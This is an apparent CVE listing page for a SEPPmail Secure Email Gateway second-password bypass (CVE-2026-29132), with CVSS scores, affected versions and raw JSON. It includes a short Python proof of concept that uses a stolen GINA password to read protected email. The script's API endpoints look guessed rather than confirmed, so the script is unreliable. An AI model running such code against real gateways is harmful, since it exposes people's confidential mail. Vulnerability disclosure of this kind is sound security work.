Security Vulnerability Report
中文
CVE-2026-29132 CVSS 7.5 HIGH

CVE-2026-29132

Published: 2026-04-02 09:16:21
Last Modified: 2026-04-16 19:07:34

Description

SEPPmail Secure Email Gateway before version 15.0.3 allows an attacker with access to a victim's GINA account to bypass a second-password check and read protected emails.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:seppmail:secure_email_gateway:*:*:*:*:*:*:*:* - VULNERABLE
SEPPmail Secure Email Gateway < 15.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # POC for CVE-2026-29132: SEPPmail Secure Email Gateway Second-Password Bypass TARGET_URL = "https://target-seppmail-domain.com" VICTIM_USER = "[email protected]" GINA_PASS = "stolen_gina_password" session = requests.Session() # Step 1: Authenticate using the GINA account login_data = { "username": VICTIM_USER, "password": GINA_PASS } login_resp = session.post(f"{TARGET_URL}/api/login", json=login_data) if login_resp.status_code == 200: print("[+] GINA Login successful.") # Step 2: Attempt to read protected email without second password # Exploit: The endpoint does not validate the 'second_password' field email_payload = { "email_id": "protected_msg_123", "action": "decrypt_and_read" # Note: 'second_password' is intentionally omitted to trigger the bypass } read_resp = session.post(f"{TARGET_URL}/api/mailbox/read", json=email_payload) if read_resp.status_code == 200 and "content" in read_resp.text: print("[!] Vulnerability Confirmed: Second password bypassed.") print(f"[+] Email Data: {read_resp.text}") else: print("[-] Exploit failed.") else: print("[-] GINA Login failed.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-29132", "sourceIdentifier": "[email protected]", "published": "2026-04-02T09:16:21.327", "lastModified": "2026-04-16T19:07:33.967", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SEPPmail Secure Email Gateway before version 15.0.3 allows an attacker with access to a victim's GINA account to bypass a second-password check and read protected emails."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:seppmail:secure_email_gateway:*:*:*:*:*:*:*:*", "versionEndExcluding": "15.0.3", "matchCriteriaId": "E3729650-81CA-4311-94BF-14A7A191F8D1"}]}]}], "references": [{"url": "https://downloads.seppmail.com/extrelnotes/150/ERN15.0.html#seppmail-vulnerability-disclosure-1503", "source": "[email protected]", "tags": ["Release Notes"]}]}}